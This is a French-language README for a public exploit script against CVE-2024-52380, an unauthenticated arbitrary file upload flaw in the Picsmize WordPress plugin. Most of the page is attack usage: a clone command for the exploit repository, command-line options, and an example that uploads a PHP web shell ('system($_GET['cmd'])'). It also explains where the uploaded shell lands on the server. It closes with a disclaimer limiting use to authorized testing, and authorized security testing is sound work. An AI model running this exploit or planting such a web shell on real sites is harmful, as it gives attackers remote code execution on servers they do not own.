
Le plugin Picsmize pour WordPress est vulnérable aux téléchargements arbitraires de fichiers.
Le plugin Picsmize pour WordPress est vulnérable aux téléchargements de fichiers arbitraires.
Ce script exploite une vulnérabilité (CVE-2024-52380) dans le plugin Picsmize pour WordPress, permettant à des attaquants non authentifiés d'effectuer des téléchargements de fichiers arbitraires. Cette vulnérabilité existe dans toutes les versions de Picsmize jusqu'à la version 1.0.0 incluse. L'exploitation de cette vulnérabilité peut entraîner une exécution de code à distance sur le serveur cible.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
Le script fournit deux arguments en ligne de commande pour faciliter l'utilisation :
-u / --url (obligatoire) :
-u http://example.com
-c / --content (facultatif) :
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress : Répertoire racine du site WordPress.wp-content/uploads : Répertoire par défaut pour les téléchargements de médias dans WordPress.2025/01 : La structure de répertoires correspond à l'année (2025) et au mois (janvier) en fonction de la configuration de la date du serveur.http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php
Ce script est destiné à des fins éducatives et uniquement à des tests de sécurité autorisés. L'utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.